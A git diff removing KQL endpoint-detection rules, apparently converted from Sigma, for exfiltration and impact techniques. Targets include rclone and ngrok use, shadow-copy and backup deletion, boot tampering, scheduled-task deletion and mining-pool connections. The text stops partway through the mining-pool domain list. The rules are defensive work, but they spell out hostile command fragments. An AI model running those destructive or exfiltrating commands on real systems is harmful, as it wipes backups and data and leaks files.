--- a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: low
-// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
-Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql
deleted file mode 100644
index a6d547c3..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Kamran Saifullah
-// Date: 2023/11/20
-// Level: medium
-// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".tunnels.api.visualstudio.com"
\ No newline at end of file
diff --git a/Exfiltration/PUA_-_Rclone_Execution.kql b/Exfiltration/PUA_-_Rclone_Execution.kql
deleted file mode 100644
index 187803ec..00000000
--- a/Exfiltration/PUA_-_Rclone_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021/05/10
-// Level: high
-// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
-// Tags: attack.exfiltration, attack.t1567.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage"))
\ No newline at end of file
diff --git a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql b/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql
deleted file mode 100644
index 68832173..00000000
--- a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/16
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io"
\ No newline at end of file
diff --git a/Exfiltration/Rclone_Config_File_Creation.kql b/Exfiltration/Rclone_Config_File_Creation.kql
deleted file mode 100644
index 670716d1..00000000
--- a/Exfiltration/Rclone_Config_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021/05/26
-// Level: medium
-// Description: Detects Rclone config files being created
-// Tags: attack.exfiltration, attack.t1567.002
-DeviceFileEvents
-| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\"
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql b/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql
deleted file mode 100644
index b9fb4ee4..00000000
--- a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/07
-// Level: critical
-// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql b/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql
deleted file mode 100644
index 6be1dff3..00000000
--- a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/16
-// Level: high
-// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
-// Tags: attack.exfiltration, attack.t1048
-DeviceProcessEvents
-| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\")
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql
deleted file mode 100644
index 4e2e05ff..00000000
--- a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/03/16
-// Level: high
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
-
-// Tags: attack.exfiltration, attack.t1048.003, cve.2023.23397
-DeviceProcessEvents
-| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254.")))
\ No newline at end of file
diff --git a/Exfiltration/Tap_Installer_Execution.kql b/Exfiltration/Tap_Installer_Execution.kql
deleted file mode 100644
index 011f6fd3..00000000
--- a/Exfiltration/Tap_Installer_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
-// Tags: attack.exfiltration, attack.t1048
-DeviceProcessEvents
-| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql
deleted file mode 100644
index d71f9266..00000000
--- a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
-This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
-
-// Tags: attack.exfiltration, attack.t1048.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql b/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 3de1df11..00000000
--- a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: high
-// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Backup_Files_Deleted.kql b/Impact/Backup_Files_Deleted.kql
deleted file mode 100644
index 742c161c..00000000
--- a/Impact/Backup_Files_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
-// Tags: attack.impact, attack.t1490
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql b/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index e80b818d..00000000
--- a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql b/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
deleted file mode 100644
index 0697d1a3..00000000
--- a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Impact/Delete_All_Scheduled_Tasks.kql b/Impact/Delete_All_Scheduled_Tasks.kql
deleted file mode 100644
index 4b16c868..00000000
--- a/Impact/Delete_All_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Delete_Important_Scheduled_Task.kql b/Impact/Delete_Important_Scheduled_Task.kql
deleted file mode 100644
index a382f4fb..00000000
--- a/Impact/Delete_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql b/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
deleted file mode 100644
index 24179601..00000000
--- a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: medium
-// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
-Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
-Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
-
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql b/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
deleted file mode 100644
index 508f1f42..00000000
--- a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/Impact/Disable_Important_Scheduled_Task.kql b/Impact/Disable_Important_Scheduled_Task.kql
deleted file mode 100644
index b31674ee..00000000
--- a/Impact/Disable_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/26
-// Level: high
-// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 230b30d6..00000000
--- a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects the recovery of files from backups via "wbadmin.exe".
-Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Fsutil_Suspicious_Invocation.kql b/Impact/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Impact/Fsutil_Suspicious_Invocation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql b/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
deleted file mode 100644
index 1428996b..00000000
--- a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects initiated network connections to crypto mining pools
-// Tags: attack.impact, attack.t1496
-DeviceNetworkEvents
-| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", 
"minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", 
